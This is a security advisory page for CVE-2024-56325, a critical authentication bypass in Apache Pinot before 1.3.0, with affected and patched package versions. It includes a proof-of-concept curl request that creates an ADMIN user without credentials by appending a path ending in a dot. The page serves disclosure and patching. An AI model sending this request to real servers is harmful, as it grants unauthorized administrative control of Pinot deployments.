VYPR
Critical severityNVD Advisory· Published Apr 1, 2025· Updated Oct 27, 2025

Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required

CVE-2024-56325

Description

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
org.apache.pinot:pinot-brokerMaven
< 1.3.01.3.0
org.apache.pinot:pinot-commonMaven
< 1.3.01.3.0
org.apache.pinot:pinot-controllerMaven
< 1.3.01.3.0

Affected products

4

Patches

Vulnerability mechanics

References

7

News mentions

0

No linked articles in our index yet.